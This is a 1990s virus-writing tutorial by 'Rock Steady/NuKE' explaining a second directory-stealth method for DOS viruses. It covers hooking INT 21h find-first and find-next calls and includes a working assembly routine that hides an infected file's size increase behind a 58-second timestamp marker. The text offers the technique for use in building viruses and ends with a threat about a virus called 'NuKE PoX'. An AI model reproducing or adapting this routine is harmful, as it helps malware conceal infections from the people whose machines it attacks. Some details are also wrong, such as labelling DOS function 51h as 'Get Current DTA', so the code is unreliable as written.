*******************************
** Dir Stealth Method 2 **
** **
** By Rock Steady/NuKE **
*******************************
Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton
Utilities, or *SOME* File Managing systems like DOS-Shell, the File
increase of infected files is know visable. There is no doubt about
it, if you only put Method #1 in your virus you will encounter times
were the file increase shows. Its not because your Routine isn't good!
But due to the fact that there is another way to Read the Dir Listing
by DOS. An this method is Call File-find by ASCIIZ format.
We just learned how to edit File-Find by FCB. Which is used by MS-DOS
PC-DOS and some other programs. But unlike the others, they use the
ASCIIZ file-Find method as it is EASIER to open, close, edite, and any
other file access routine is ALOT easier with the ASCIIZ or (File Handle)
system. So we will make our Virus Stealth to Method #2! Making us 100%
Stealth from file-finds...
The Function we have to Intecept is Interrupt 21h, with Functions
AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File)
The Way to go about it is Very much ALIKE to the first one, so just
understand the thoery, and you'll be able to program it within
seconds.
When this function is called, it will fill the current DTA with 12
entries totally 43 bytes. The DTA will be set up as follows: (below)
BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T
like the FCB, or PSP that is anyways the same! You can play with
this as you wish. You also use this DTA to read the Command Line
Parameters...etc...
Offset Size Description
DDDDDEDDDDEDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
00h 3 1 3 Drive Letter
01h 3 11 3 Seach Template (Eg:????????COM)
0Ch 3 1 3 Attribute Search
0Dh 3 2 3 Entry count within Directory
0Fh 3 2 3 Cluster Number of start of parent directory
11h 3 4 3 Reserved (Atleast Undocumented)
15h 3 1 3 Attribute of File FOUND
@ 16h 3 2 3 File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year
18h 3 2 3 File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year
* 1Ah 3 4 3 File's Size (Word Reverse Order, Dah!!?!)
1Eh 3 13 3 ASCIIZ File name & Extension
* = Must be Edited by Virus is File Infected
@ = Needed to Check if File is Infected. (Seconds Field)
%Algorthm%
~~~~~~~~~~
CONDISTION: DS:DX points to ASCIIZ of file search.
CX: Contains File Attributes
Step 1. Call Dos so it fills the DTA with its findings
Step 2. Test for CF=1 (Carry Flag) as error happened
errors happen if File not found, no more files etc...
Step 3. Get Seconds Field And UnMask Seconds
Step 4. Check if seconds = 58 (What ever your using) Quit if NOT
Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh'
Check in your ASM Bible, which is Faster? Size?
Remember speed & size is EVERYTHING, That is why
My lastest are quite small viriis for stealthness!!
Step 5. If Infected Subtract Virus Size from File
Step 6. Quit
;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this
;Routine... (Look at Method #1 for Int21h handler)
Dir_Stealth2
pushf ;Fake an Int Call
push cs ;Save our location
call int21Call ;Step #1
jc no_good ;Error Split
push ax
push bx
push es
mov ah,51h ;Get Current DTA
int 21h ;ES:BX --> DTA
mov ax,es:[bx+16h] ;Get File Time
and ax,1fh ;Un Mask Seconds field
xor al,1dh ;Is it 58 Seconds?
jnz not_infected ;Not infected! Dah?
sub es:[bx+1Ah],Virus_Size ;Minus Virus Size!
sbb es:[bx+1Ch],0 ;Fix up the Sub, Carrying!
not_infected:
pop es
pop bx ;Restore Registers
pop ax
no_Good:iret
; This code WORKS and is also 100% (c) Rock Steady / NuKE
;--------------------------EnD-------------------------------
Rock Steady
`WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'